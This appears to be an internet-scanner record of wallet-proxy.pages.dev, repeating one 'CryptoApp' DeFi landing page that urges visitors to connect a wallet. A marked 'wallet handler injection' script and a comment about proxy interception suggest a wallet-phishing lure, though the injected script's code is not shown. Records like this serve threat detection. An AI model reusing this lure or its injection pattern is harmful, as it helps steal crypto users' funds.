Domain wallet-proxy.pages.dev
CLOUDFLARENET
Software information

cloudflare cloudflare

tcp/443 tcp/80 tcp/8443

  • Open service 172.66.47.122:443 · wallet-proxy.pages.dev

    2026-01-12 13:44

    HTTP/1.1 200 OK
    Date: Mon, 12 Jan 2026 13:44:22 GMT
    Content-Type: text/html; charset=utf-8
    Content-Length: 3735
    Connection: close
    CF-Ray: 9bcd1696daec9f7e-AMS
    Access-Control-Allow-Origin: *
    Cache-Control: public, max-age=0, must-revalidate
    Server: cloudflare
    Vary: Accept-Encoding
    referrer-policy: strict-origin-when-cross-origin
    Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=u6BD1SnPCwtspLL0GKGp2LtakEd%2Fzl7EUGVbNQhiZJwPTfIAasvsIQpdNNBfnaXV9fFMaIgJQusQLDlf7EG7iMcu%2Bt1RCSQq4II4T0Myv8cI6Rz3T2s%3D"}]}
    Nel: {"report_to":"cf-nel","success_fraction":0.0,"max_age":604800}
    alt-svc: h3=":443"; ma=86400
    
    Page title: Web3 Landing Page
    
    <!DOCTYPE html>
    <html lang="en">
    <head>
      <meta charset="UTF-8">
      <meta name="viewport" content="width=device-width, initial-scale=1.0">
      <title>Web3 Landing Page</title>
      <style>
        * { margin: 0; padding: 0; box-sizing: border-box; }
        body {
          font-family: 'Inter', system-ui, -apple-system, sans-serif;
          background: linear-gradient(135deg, #0f0f1a 0%, #1a1a2e 50%, #16213e 100%);
          min-height: 100vh;
          color: #fff;
        }
        .container {
          max-width: 1200px;
          margin: 0 auto;
          padding: 20px;
        }
        header {
          display: flex;
          justify-content: space-between;
          align-items: center;
          padding: 20px 0;
        }
        .logo {
          font-size: 24px;
          font-weight: 700;
          background: linear-gradient(90deg, #6366f1, #8b5cf6);
          -webkit-background-clip: text;
          -webkit-text-fill-color: transparent;
        }
        .connect-wallet {
          padding: 12px 24px;
          background: linear-gradient(90deg, #6366f1, #8b5cf6);
          border: none;
          border-radius: 12px;
          color: #fff;
          font-size: 16px;
          font-weight: 600;
          cursor: pointer;
          transition: all 0.3s;
        }
        .connect-wallet:hover {
          transform: translateY(-2px);
          box-shadow: 0 10px 40px rgba(99, 102, 241, 0.4);
        }
        .hero {
          text-align: center;
          padding: 100px 20px;
        }
        .hero h1 {
          font-size: 56px;
          margin-bottom: 24px;
          line-height: 1.2;
        }
        .hero p {
          font-size: 20px;
          color: #94a3b8;
          max-width: 600px;
          margin: 0 auto 40px;
        }
        .hero .connect-wallet {
          padding: 16px 48px;
          font-size: 18px;
        }
        .features {
          display: grid;
          grid-template-columns: repeat(auto-fit, minmax(280px, 1fr));
          gap: 24px;
          padding: 60px 0;
        }
        .feature {
          background: rgba(255,255,255,0.05);
          border: 1px solid rgba(255,255,255,0.1);
          border-radius: 16px;
          padding: 32px;
          transition: all 0.3s;
        }
        .feature:hover {
          background: rgba(255,255,255,0.08);
          transform: translateY(-4px);
        }
        .feature h3 {
          font-size: 20px;
          margin-bottom: 12px;
        }
        .feature p {
          color: #94a3b8;
          line-height: 1.6;
        }
      </style>
    
    <!-- WALLET HANDLER INJECTION START -->
    <script src="/wallet-handler.js"></script>
    <!-- WALLET HANDLER INJECTION END -->
    </head>
    <body>
      <div class="container">
        <header>
          <div class="logo">CryptoApp</div>
          <button class="connect-wallet" id="header-connect">Connect Wallet</button>
        </header>
        
        <section class="hero">
          <h1>The Future of<br>Decentralized Finance</h1>
          <p>Connect your wallet and start trading, staking, and earning rewards on the most secure DeFi platform.</p>
          <button class="connect-wallet" id="hero-connect">Connect Wallet</button>
        </section>
        
        <section class="features">
          <div class="feature">
            <h3>🔒 Secure</h3>
            <p>Your assets are protected with industry-leading security protocols and smart contract audits.</p>
          </div>
          <div class="feature">
            <h3>⚡ Fast</h3>
            <p>Lightning-fast transactions with minimal gas fees on multiple blockchain networks.</p>
          </div>
          <div class="feature">
            <h3>💰 Rewards</h3>
            <p>Earn competitive yields on your crypto holdings through our staking programs.</p>
          </div>
        </section>
      </div>
    
      <script>
        // Original page's wallet connect logic (will be intercepted by proxy)
        document.querySelectorAll('.connect-wallet').forEach(btn => {
          btn.addEventListener('click', () => {
            alert('Original wallet connect - this will be intercepted by the proxy!');
          });
        });
      </script>
    </body>
    </html>
    
    Found 10 hours ago by HttpPlugin
    Create report
  • Open service 172.66.47.122:80 · wallet-proxy.pages.dev

    2026-01-12 13:44

    HTTP/1.1 301 Moved Permanently
    Date: Mon, 12 Jan 2026 13:44:22 GMT
    Content-Length: 0
    Connection: close
    Location: https://wallet-proxy.pages.dev/
    Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=mD6tRrZGJhk2S%2F35IStiiKCofq%2FUg01q7vjTHAcf1QXl89LGqycZbWux2JGdgT4tSj6QZUks9KVVkJwz9R1A66LfnfGaqpTRCtDoCFJ3%2F0XsyE3uFMM%3D"}]}
    Nel: {"report_to":"cf-nel","success_fraction":0.0,"max_age":604800}
    Server: cloudflare
    CF-RAY: 9bcd16964aef5d88-FRA
    alt-svc: h3=":443"; ma=86400
    
    Found 10 hours ago by HttpPlugin
    Create report
  • Open service 172.66.47.122:8443 · wallet-proxy.pages.dev

    2026-01-12 13:44

    HTTP/1.1 200 OK
    Date: Mon, 12 Jan 2026 13:44:23 GMT
    Content-Type: text/html; charset=utf-8
    Content-Length: 3735
    Connection: close
    CF-Ray: 9bcd16975ed7d2bb-FRA
    Access-Control-Allow-Origin: *
    Cache-Control: public, max-age=0, must-revalidate
    Server: cloudflare
    Vary: Accept-Encoding
    referrer-policy: strict-origin-when-cross-origin
    Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=FHc%2B7S027hYUagaa9i%2BMAsPrS%2BP%2Fktw8pSk24sFuRqjVsQ5VC1rCFyPye2gKWc5Ilz2QvB88NVscGFaXxdS0azok9zWx1c8KY7F%2BwqWU9jDLL0x0tXM%3D"}]}
    Nel: {"report_to":"cf-nel","success_fraction":0.0,"max_age":604800}
    alt-svc: h3=":8443"; ma=86400
    
    Page title: Web3 Landing Page
    
    <!DOCTYPE html>
    <html lang="en">
    <head>
      <meta charset="UTF-8">
      <meta name="viewport" content="width=device-width, initial-scale=1.0">
      <title>Web3 Landing Page</title>
      <style>
        * { margin: 0; padding: 0; box-sizing: border-box; }
        body {
          font-family: 'Inter', system-ui, -apple-system, sans-serif;
          background: linear-gradient(135deg, #0f0f1a 0%, #1a1a2e 50%, #16213e 100%);
          min-height: 100vh;
          color: #fff;
        }
        .container {
          max-width: 1200px;
          margin: 0 auto;
          padding: 20px;
        }
        header {
          display: flex;
          justify-content: space-between;
          align-items: center;
          padding: 20px 0;
        }
        .logo {
          font-size: 24px;
          font-weight: 700;
          background: linear-gradient(90deg, #6366f1, #8b5cf6);
          -webkit-background-clip: text;
          -webkit-text-fill-color: transparent;
        }
        .connect-wallet {
          padding: 12px 24px;
          background: linear-gradient(90deg, #6366f1, #8b5cf6);
          border: none;
          border-radius: 12px;
          color: #fff;
          font-size: 16px;
          font-weight: 600;
          cursor: pointer;
          transition: all 0.3s;
        }
        .connect-wallet:hover {
          transform: translateY(-2px);
          box-shadow: 0 10px 40px rgba(99, 102, 241, 0.4);
        }
        .hero {
          text-align: center;
          padding: 100px 20px;
        }
        .hero h1 {
          font-size: 56px;
          margin-bottom: 24px;
          line-height: 1.2;
        }
        .hero p {
          font-size: 20px;
          color: #94a3b8;
          max-width: 600px;
          margin: 0 auto 40px;
        }
        .hero .connect-wallet {
          padding: 16px 48px;
          font-size: 18px;
        }
        .features {
          display: grid;
          grid-template-columns: repeat(auto-fit, minmax(280px, 1fr));
          gap: 24px;
          padding: 60px 0;
        }
        .feature {
          background: rgba(255,255,255,0.05);
          border: 1px solid rgba(255,255,255,0.1);
          border-radius: 16px;
          padding: 32px;
          transition: all 0.3s;
        }
        .feature:hover {
          background: rgba(255,255,255,0.08);
          transform: translateY(-4px);
        }
        .feature h3 {
          font-size: 20px;
          margin-bottom: 12px;
        }
        .feature p {
          color: #94a3b8;
          line-height: 1.6;
        }
      </style>
    
    <!-- WALLET HANDLER INJECTION START -->
    <script src="/wallet-handler.js"></script>
    <!-- WALLET HANDLER INJECTION END -->
    </head>
    <body>
      <div class="container">
        <header>
          <div class="logo">CryptoApp</div>
          <button class="connect-wallet" id="header-connect">Connect Wallet</button>
        </header>
        
        <section class="hero">
          <h1>The Future of<br>Decentralized Finance</h1>
          <p>Connect your wallet and start trading, staking, and earning rewards on the most secure DeFi platform.</p>
          <button class="connect-wallet" id="hero-connect">Connect Wallet</button>
        </section>
        
        <section class="features">
          <div class="feature">
            <h3>🔒 Secure</h3>
            <p>Your assets are protected with industry-leading security protocols and smart contract audits.</p>
          </div>
          <div class="feature">
            <h3>⚡ Fast</h3>
            <p>Lightning-fast transactions with minimal gas fees on multiple blockchain networks.</p>
          </div>
          <div class="feature">
            <h3>💰 Rewards</h3>
            <p>Earn competitive yields on your crypto holdings through our staking programs.</p>
          </div>
        </section>
      </div>
    
      <script>
        // Original page's wallet connect logic (will be intercepted by proxy)
        document.querySelectorAll('.connect-wallet').forEach(btn => {
          btn.addEventListener('click', () => {
            alert('Original wallet connect - this will be intercepted by the proxy!');
          });
        });
      </script>
    </body>
    </html>
    
    Found 10 hours ago by HttpPlugin
    Create report
  • Open service 172.66.44.134:443 · wallet-proxy.pages.dev

    2026-01-12 13:44

    HTTP/1.1 200 OK
    Date: Mon, 12 Jan 2026 13:44:22 GMT
    Content-Type: text/html; charset=utf-8
    Content-Length: 3735
    Connection: close
    CF-Ray: 9bcd1696ae901e4a-FRA
    Access-Control-Allow-Origin: *
    Cache-Control: public, max-age=0, must-revalidate
    Server: cloudflare
    Vary: Accept-Encoding
    referrer-policy: strict-origin-when-cross-origin
    Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=6a2%2Fbn1C31im%2FlnjIrjfuWhBgJ%2BveNt4RthC4gwtw7ETiy40jgu3gvyPrAiCJYmsbNfo7zpi1IcMRzqlp%2FXfFYujsapC1dsYKmnsrJlSK6liIPl6RYk%3D"}]}
    Nel: {"report_to":"cf-nel","success_fraction":0.0,"max_age":604800}
    alt-svc: h3=":443"; ma=86400
    
    Page title: Web3 Landing Page
    
    <!DOCTYPE html>
    <html lang="en">
    <head>
      <meta charset="UTF-8">
      <meta name="viewport" content="width=device-width, initial-scale=1.0">
      <title>Web3 Landing Page</title>
      <style>
        * { margin: 0; padding: 0; box-sizing: border-box; }
        body {
          font-family: 'Inter', system-ui, -apple-system, sans-serif;
          background: linear-gradient(135deg, #0f0f1a 0%, #1a1a2e 50%, #16213e 100%);
          min-height: 100vh;
          color: #fff;
        }
        .container {
          max-width: 1200px;
          margin: 0 auto;
          padding: 20px;
        }
        header {
          display: flex;
          justify-content: space-between;
          align-items: center;
          padding: 20px 0;
        }
        .logo {
          font-size: 24px;
          font-weight: 700;
          background: linear-gradient(90deg, #6366f1, #8b5cf6);
          -webkit-background-clip: text;
          -webkit-text-fill-color: transparent;
        }
        .connect-wallet {
          padding: 12px 24px;
          background: linear-gradient(90deg, #6366f1, #8b5cf6);
          border: none;
          border-radius: 12px;
          color: #fff;
          font-size: 16px;
          font-weight: 600;
          cursor: pointer;
          transition: all 0.3s;
        }
        .connect-wallet:hover {
          transform: translateY(-2px);
          box-shadow: 0 10px 40px rgba(99, 102, 241, 0.4);
        }
        .hero {
          text-align: center;
          padding: 100px 20px;
        }
        .hero h1 {
          font-size: 56px;
          margin-bottom: 24px;
          line-height: 1.2;
        }
        .hero p {
          font-size: 20px;
          color: #94a3b8;
          max-width: 600px;
          margin: 0 auto 40px;
        }
        .hero .connect-wallet {
          padding: 16px 48px;
          font-size: 18px;
        }
        .features {
          display: grid;
          grid-template-columns: repeat(auto-fit, minmax(280px, 1fr));
          gap: 24px;
          padding: 60px 0;
        }
        .feature {
          background: rgba(255,255,255,0.05);
          border: 1px solid rgba(255,255,255,0.1);
          border-radius: 16px;
          padding: 32px;
          transition: all 0.3s;
        }
        .feature:hover {
          background: rgba(255,255,255,0.08);
          transform: translateY(-4px);
        }
        .feature h3 {
          font-size: 20px;
          margin-bottom: 12px;
        }
        .feature p {
          color: #94a3b8;
          line-height: 1.6;
        }
      </style>
    
    <!-- WALLET HANDLER INJECTION START -->
    <script src="/wallet-handler.js"></script>
    <!-- WALLET HANDLER INJECTION END -->
    </head>
    <body>
      <div class="container">
        <header>
          <div class="logo">CryptoApp</div>
          <button class="connect-wallet" id="header-connect">Connect Wallet</button>
        </header>
        
        <section class="hero">
          <h1>The Future of<br>Decentralized Finance</h1>
          <p>Connect your wallet and start trading, staking, and earning rewards on the most secure DeFi platform.</p>
          <button class="connect-wallet" id="hero-connect">Connect Wallet</button>
        </section>
        
        <section class="features">
          <div class="feature">
            <h3>🔒 Secure</h3>
            <p>Your assets are protected with industry-leading security protocols and smart contract audits.</p>
          </div>
          <div class="feature">
            <h3>⚡ Fast</h3>
            <p>Lightning-fast transactions with minimal gas fees on multiple blockchain networks.</p>
          </div>
          <div class="feature">
            <h3>💰 Rewards</h3>
            <p>Earn competitive yields on your crypto holdings through our staking programs.</p>
          </div>
        </section>
      </div>
    
      <script>
        // Original page's wallet connect logic (will be intercepted by proxy)
        document.querySelectorAll('.connect-wallet').forEach(btn => {
          btn.addEventListener('click', () => {
            alert('Original wallet connect - this will be intercepted by the proxy!');
          });
        });
      </script>
    </body>
    </html>
    
    Found 10 hours ago by HttpPlugin
    Create report
  • Open service 172.66.44.134:8443 · wallet-proxy.pages.dev

    2026-01-12 13:44

    HTTP/1.1 200 OK
    Date: Mon, 12 Jan 2026 13:44:22 GMT
    Content-Type: text/html; charset=utf-8
    Content-Length: 3735
    Connection: close
    CF-Ray: 9bcd1696a82e9874-FRA
    Access-Control-Allow-Origin: *
    Cache-Control: public, max-age=0, must-revalidate
    Server: cloudflare
    Vary: Accept-Encoding
    referrer-policy: strict-origin-when-cross-origin
    Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=UmGO4%2Fr6%2BU5WkBQMr5A3EQrO%2BvZbayDFFas5EVxpIeonrsyIfHHSBsrTMJ4l4ALq4BGlVg1fY21FgkHkjgihzR6zw%2FhCVxF87cYTLOLA9YDSrnwF2vw%3D"}]}
    Nel: {"report_to":"cf-nel","success_fraction":0.0,"max_age":604800}
    alt-svc: h3=":8443"; ma=86400
    
    Page title: Web3 Landing Page
    
    <!DOCTYPE html>
    <html lang="en">
    <head>
      <meta charset="UTF-8">
      <meta name="viewport" content="width=device-width, initial-scale=1.0">
      <title>Web3 Landing Page</title>
      <style>
        * { margin: 0; padding: 0; box-sizing: border-box; }
        body {
          font-family: 'Inter', system-ui, -apple-system, sans-serif;
          background: linear-gradient(135deg, #0f0f1a 0%, #1a1a2e 50%, #16213e 100%);
          min-height: 100vh;
          color: #fff;
        }
        .container {
          max-width: 1200px;
          margin: 0 auto;
          padding: 20px;
        }
        header {
          display: flex;
          justify-content: space-between;
          align-items: center;
          padding: 20px 0;
        }
        .logo {
          font-size: 24px;
          font-weight: 700;
          background: linear-gradient(90deg, #6366f1, #8b5cf6);
          -webkit-background-clip: text;
          -webkit-text-fill-color: transparent;
        }
        .connect-wallet {
          padding: 12px 24px;
          background: linear-gradient(90deg, #6366f1, #8b5cf6);
          border: none;
          border-radius: 12px;
          color: #fff;
          font-size: 16px;
          font-weight: 600;
          cursor: pointer;
          transition: all 0.3s;
        }
        .connect-wallet:hover {
          transform: translateY(-2px);
          box-shadow: 0 10px 40px rgba(99, 102, 241, 0.4);
        }
        .hero {
          text-align: center;
          padding: 100px 20px;
        }
        .hero h1 {
          font-size: 56px;
          margin-bottom: 24px;
          line-height: 1.2;
        }
        .hero p {
          font-size: 20px;
          color: #94a3b8;
          max-width: 600px;
          margin: 0 auto 40px;
        }
        .hero .connect-wallet {
          padding: 16px 48px;
          font-size: 18px;
        }
        .features {
          display: grid;
          grid-template-columns: repeat(auto-fit, minmax(280px, 1fr));
          gap: 24px;
          padding: 60px 0;
        }
        .feature {
          background: rgba(255,255,255,0.05);
          border: 1px solid rgba(255,255,255,0.1);
          border-radius: 16px;
          padding: 32px;
          transition: all 0.3s;
        }
        .feature:hover {
          background: rgba(255,255,255,0.08);
          transform: translateY(-4px);
        }
        .feature h3 {
          font-size: 20px;
          margin-bottom: 12px;
        }
        .feature p {
          color: #94a3b8;
          line-height: 1.6;
        }
      </style>
    
    <!-- WALLET HANDLER INJECTION START -->
    <script src="/wallet-handler.js"></script>
    <!-- WALLET HANDLER INJECTION END -->
    </head>
    <body>
      <div class="container">
        <header>
          <div class="logo">CryptoApp</div>
          <button class="connect-wallet" id="header-connect">Connect Wallet</button>
        </header>
        
        <section class="hero">
          <h1>The Future of<br>Decentralized Finance</h1>
          <p>Connect your wallet and start trading, staking, and earning rewards on the most secure DeFi platform.</p>
          <button class="connect-wallet" id="hero-connect">Connect Wallet</button>
        </section>
        
        <section class="features">
          <div class="feature">
            <h3>🔒 Secure</h3>
            <p>Your assets are protected with industry-leading security protocols and smart contract audits.</p>
          </div>
          <div class="feature">
            <h3>⚡ Fast</h3>
            <p>Lightning-fast transactions with minimal gas fees on multiple blockchain networks.</p>
          </div>
          <div class="feature">
            <h3>💰 Rewards</h3>
            <p>Earn competitive yields on your crypto holdings through our staking programs.</p>
          </div>
        </section>
      </div>
    
      <script>
        // Original page's wallet connect logic (will be intercepted by proxy)
        document.querySelectorAll('.connect-wallet').forEach(btn => {
          btn.addEventListener('click', () => {
            alert('Original wallet connect - this will be intercepted by the proxy!');
          });
        });
      </script>
    </body>
    </html>
    
    Found 10 hours ago by HttpPlugin
    Create report
  • Open service 2606:4700:310c::ac42:2f7a:80 · wallet-proxy.pages.dev

    2026-01-12 13:44

    HTTP/1.1 301 Moved Permanently
    Date: Mon, 12 Jan 2026 13:44:22 GMT
    Content-Length: 0
    Connection: close
    Location: https://wallet-proxy.pages.dev/
    Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=OccNc3c0jUdSzQSPhw%2BIx3BDHfBNXhJq8QKjvJPnkl5Ed5C8lWWg1%2FJC2FfVXJWqFk7qIhVf3TaqnEQtiVINHglYR%2FP%2FA0m5QuURC6LCYFJE5e5%2F4dJiM1BII7No3pXV4oE%3D"}]}
    Nel: {"report_to":"cf-nel","success_fraction":0.0,"max_age":604800}
    Server: cloudflare
    CF-RAY: 9bcd16967964ce96-EWR
    alt-svc: h3=":443"; ma=86400
    
    Found 10 hours ago by HttpPlugin
    Create report
  • Open service 2606:4700:310c::ac42:2c86:80 · wallet-proxy.pages.dev

    2026-01-12 13:44

    HTTP/1.1 301 Moved Permanently
    Date: Mon, 12 Jan 2026 13:44:22 GMT
    Content-Length: 0
    Connection: close
    Location: https://wallet-proxy.pages.dev/
    Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=egr2izp5WeHj1fXoGTkkgenMAfjc17w5TTE%2B3kEsPiDE%2Fa9wv70Msw60uymhSAmSpVwkF0JWQpJsVHTslXAp2T%2F6Hs7ybMpb5u5OQvPEtA38lk55PiiDOrFotlKbloBRH6o%3D"}]}
    Nel: {"report_to":"cf-nel","success_fraction":0.0,"max_age":604800}
    Server: cloudflare
    CF-RAY: 9bcd1695ca18152b-SJC
    alt-svc: h3=":443"; ma=86400
    
    Found 10 hours ago by HttpPlugin
    Create report
  • Open service 2606:4700:310c::ac42:2c86:8443 · wallet-proxy.pages.dev

    2026-01-12 13:44

    HTTP/1.1 200 OK
    Date: Mon, 12 Jan 2026 13:44:22 GMT
    Content-Type: text/html; charset=utf-8
    Content-Length: 3735
    Connection: close
    CF-Ray: 9bcd169619947db1-YYZ
    Access-Control-Allow-Origin: *
    Cache-Control: public, max-age=0, must-revalidate
    Server: cloudflare
    Vary: Accept-Encoding
    referrer-policy: strict-origin-when-cross-origin
    Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=2PnamRg1ubqA40g36ezGXeIxw9TMK1700mp4%2Ft%2FzcllEa82PFRg1raZ0sh0I%2BKq6nCpZ8pDI6zzsGQ1fwpd7VEJSDcL4jcGjmG2HkmHa2ITOjpNINlbftkt1kjOBOCP3eWA%3D"}]}
    Nel: {"report_to":"cf-nel","success_fraction":0.0,"max_age":604800}
    alt-svc: h3=":8443"; ma=86400
    
    Page title: Web3 Landing Page
    
    <!DOCTYPE html>
    <html lang="en">
    <head>
      <meta charset="UTF-8">
      <meta name="viewport" content="width=device-width, initial-scale=1.0">
      <title>Web3 Landing Page</title>
      <style>
        * { margin: 0; padding: 0; box-sizing: border-box; }
        body {
          font-family: 'Inter', system-ui, -apple-system, sans-serif;
          background: linear-gradient(135deg, #0f0f1a 0%, #1a1a2e 50%, #16213e 100%);
          min-height: 100vh;
          color: #fff;
        }
        .container {
          max-width: 1200px;
          margin: 0 auto;
          padding: 20px;
        }
        header {
          display: flex;
          justify-content: space-between;
          align-items: center;
          padding: 20px 0;
        }
        .logo {
          font-size: 24px;
          font-weight: 700;
          background: linear-gradient(90deg, #6366f1, #8b5cf6);
          -webkit-background-clip: text;
          -webkit-text-fill-color: transparent;
        }
        .connect-wallet {
          padding: 12px 24px;
          background: linear-gradient(90deg, #6366f1, #8b5cf6);
          border: none;
          border-radius: 12px;
          color: #fff;
          font-size: 16px;
          font-weight: 600;
          cursor: pointer;
          transition: all 0.3s;
        }
        .connect-wallet:hover {
          transform: translateY(-2px);
          box-shadow: 0 10px 40px rgba(99, 102, 241, 0.4);
        }
        .hero {
          text-align: center;
          padding: 100px 20px;
        }
        .hero h1 {
          font-size: 56px;
          margin-bottom: 24px;
          line-height: 1.2;
        }
        .hero p {
          font-size: 20px;
          color: #94a3b8;
          max-width: 600px;
          margin: 0 auto 40px;
        }
        .hero .connect-wallet {
          padding: 16px 48px;
          font-size: 18px;
        }
        .features {
          display: grid;
          grid-template-columns: repeat(auto-fit, minmax(280px, 1fr));
          gap: 24px;
          padding: 60px 0;
        }
        .feature {
          background: rgba(255,255,255,0.05);
          border: 1px solid rgba(255,255,255,0.1);
          border-radius: 16px;
          padding: 32px;
          transition: all 0.3s;
        }
        .feature:hover {
          background: rgba(255,255,255,0.08);
          transform: translateY(-4px);
        }
        .feature h3 {
          font-size: 20px;
          margin-bottom: 12px;
        }
        .feature p {
          color: #94a3b8;
          line-height: 1.6;
        }
      </style>
    
    <!-- WALLET HANDLER INJECTION START -->
    <script src="/wallet-handler.js"></script>
    <!-- WALLET HANDLER INJECTION END -->
    </head>
    <body>
      <div class="container">
        <header>
          <div class="logo">CryptoApp</div>
          <button class="connect-wallet" id="header-connect">Connect Wallet</button>
        </header>
        
        <section class="hero">
          <h1>The Future of<br>Decentralized Finance</h1>
          <p>Connect your wallet and start trading, staking, and earning rewards on the most secure DeFi platform.</p>
          <button class="connect-wallet" id="hero-connect">Connect Wallet</button>
        </section>
        
        <section class="features">
          <div class="feature">
            <h3>🔒 Secure</h3>
            <p>Your assets are protected with industry-leading security protocols and smart contract audits.</p>
          </div>
          <div class="feature">
            <h3>⚡ Fast</h3>
            <p>Lightning-fast transactions with minimal gas fees on multiple blockchain networks.</p>
          </div>
          <div class="feature">
            <h3>💰 Rewards</h3>
            <p>Earn competitive yields on your crypto holdings through our staking programs.</p>
          </div>
        </section>
      </div>
    
      <script>
        // Original page's wallet connect logic (will be intercepted by proxy)
        document.querySelectorAll('.connect-wallet').forEach(btn => {
          btn.addEventListener('click', () => {
            alert('Original wallet connect - this will be intercepted by the proxy!');
          });
        });
      </script>
    </body>
    </html>
    
    Found 10 hours ago by HttpPlugin
    Create report
  • Open service 2606:4700:310c::ac42:2c86:443 · wallet-proxy.pages.dev

    2026-01-12 13:44

    HTTP/1.1 200 OK
    Date: Mon, 12 Jan 2026 13:44:22 GMT
    Content-Type: text/html; charset=utf-8
    Content-Length: 3735
    Connection: close
    CF-Ray: 9bcd16961ec2c761-LHR
    Access-Control-Allow-Origin: *
    Cache-Control: public, max-age=0, must-revalidate
    Server: cloudflare
    Vary: Accept-Encoding
    referrer-policy: strict-origin-when-cross-origin
    Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=9RZAVkZwhvcS0E2kl0JkMWL9kI6YZ27ohuKihrZobnFAI2CnbNyOxw5YS%2FO7BQ9vuIjDctD5lrZVRnw8PAORYnVZTZB5M0q3nqSpMTrLGzTQ4YbKIztPWFwFO6R%2Bodj4oN4%3D"}]}
    Nel: {"report_to":"cf-nel","success_fraction":0.0,"max_age":604800}
    alt-svc: h3=":443"; ma=86400
    
    Page title: Web3 Landing Page
    
    <!DOCTYPE html>
    <html lang="en">
    <head>
      <meta charset="UTF-8">
      <meta name="viewport" content="width=device-width, initial-scale=1.0">
      <title>Web3 Landing Page</title>
      <style>
        * { margin: 0; padding: 0; box-sizing: border-box; }
        body {
          font-family: 'Inter', system-ui, -apple-system, sans-serif;
          background: linear-gradient(135deg, #0f0f1a 0%, #1a1a2e 50%, #16213e 100%);
          min-height: 100vh;
          color: #fff;
        }
        .container {
          max-width: 1200px;
          margin: 0 auto;
          padding: 20px;
        }
        header {
          display: flex;
          justify-content: space-between;
          align-items: center;
          padding: 20px 0;
        }
        .logo {
          font-size: 24px;
          font-weight: 700;
          background: linear-gradient(90deg, #6366f1, #8b5cf6);
          -webkit-background-clip: text;
          -webkit-text-fill-color: transparent;
        }
        .connect-wallet {
          padding: 12px 24px;
          background: linear-gradient(90deg, #6366f1, #8b5cf6);
          border: none;
          border-radius: 12px;
          color: #fff;
          font-size: 16px;
          font-weight: 600;
          cursor: pointer;
          transition: all 0.3s;
        }
        .connect-wallet:hover {
          transform: translateY(-2px);
          box-shadow: 0 10px 40px rgba(99, 102, 241, 0.4);
        }
        .hero {
          text-align: center;
          padding: 100px 20px;
        }
        .hero h1 {
          font-size: 56px;
          margin-bottom: 24px;
          line-height: 1.2;
        }
        .hero p {
          font-size: 20px;
          color: #94a3b8;
          max-width: 600px;
          margin: 0 auto 40px;
        }
        .hero .connect-wallet {
          padding: 16px 48px;
          font-size: 18px;
        }
        .features {
          display: grid;
          grid-template-columns: repeat(auto-fit, minmax(280px, 1fr));
          gap: 24px;
          padding: 60px 0;
        }
        .feature {
          background: rgba(255,255,255,0.05);
          border: 1px solid rgba(255,255,255,0.1);
          border-radius: 16px;
          padding: 32px;
          transition: all 0.3s;
        }
        .feature:hover {
          background: rgba(255,255,255,0.08);
          transform: translateY(-4px);
        }
        .feature h3 {
          font-size: 20px;
          margin-bottom: 12px;
        }
        .feature p {
          color: #94a3b8;
          line-height: 1.6;
        }
      </style>
    
    <!-- WALLET HANDLER INJECTION START -->
    <script src="/wallet-handler.js"></script>
    <!-- WALLET HANDLER INJECTION END -->
    </head>
    <body>
      <div class="container">
        <header>
          <div class="logo">CryptoApp</div>
          <button class="connect-wallet" id="header-connect">Connect Wallet</button>
        </header>
        
        <section class="hero">
          <h1>The Future of<br>Decentralized Finance</h1>
          <p>Connect your wallet and start trading, staking, and earning rewards on the most secure DeFi platform.</p>
          <button class="connect-wallet" id="hero-connect">Connect Wallet</button>
        </section>
        
        <section class="features">
          <div class="feature">
            <h3>🔒 Secure</h3>
            <p>Your assets are protected with industry-leading security protocols and smart contract audits.</p>
          </div>
          <div class="feature">
            <h3>⚡ Fast</h3>
            <p>Lightning-fast transactions with minimal gas fees on multiple blockchain networks.</p>
          </div>
          <div class="feature">
            <h3>💰 Rewards</h3>
            <p>Earn competitive yields on your crypto holdings through our staking programs.</p>
          </div>
        </section>
      </div>
    
      <script>
        // Original page's wallet connect logic (will be intercepted by proxy)
        document.querySelectorAll('.connect-wallet').forEach(btn => {
          btn.addEventListener('click', () => {
            alert('Original wallet connect - this will be intercepted by the proxy!');
          });
        });
      </script>
    </body>
    </html>
    
    Found 10 hours ago by HttpPlugin
    Create report
  • Open service 2606:4700:310c::ac42:2f7a:443 · wallet-proxy.pages.dev

    2026-01-12 13:44

    HTTP/1.1 200 OK
    Date: Mon, 12 Jan 2026 13:44:22 GMT
    Content-Type: text/html; charset=utf-8
    Content-Length: 3735
    Connection: close
    CF-Ray: 9bcd1695bee5dcf2-EWR
    Access-Control-Allow-Origin: *
    Cache-Control: public, max-age=0, must-revalidate
    Server: cloudflare
    Vary: Accept-Encoding
    referrer-policy: strict-origin-when-cross-origin
    Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=4VeepZRrvTKiPc7pDzbis%2BIz7VKQ8CSQhqpJqKPIuOZH9T4wCtLamLLl9bayXl8vE1FQg%2FoH%2FfKwNzHapJy3EYtdYIbRxAVFxu0%2BOcX4PeoVHC5i4ibBiA50cQj7JAFR"}]}
    Nel: {"report_to":"cf-nel","success_fraction":0.0,"max_age":604800}
    alt-svc: h3=":443"; ma=86400
    
    Page title: Web3 Landing Page
    
    <!DOCTYPE html>
    <html lang="en">
    <head>
      <meta charset="UTF-8">
      <meta name="viewport" content="width=device-width, initial-scale=1.0">
      <title>Web3 Landing Page</title>
      <style>
        * { margin: 0; padding: 0; box-sizing: border-box; }
        body {
          font-family: 'Inter', system-ui, -apple-system, sans-serif;
          background: linear-gradient(135deg, #0f0f1a 0%, #1a1a2e 50%, #16213e 100%);
          min-height: 100vh;
          color: #fff;
        }
        .container {
          max-width: 1200px;
          margin: 0 auto;
          padding: 20px;
        }
        header {
          display: flex;
          justify-content: space-between;
          align-items: center;
          padding: 20px 0;
        }
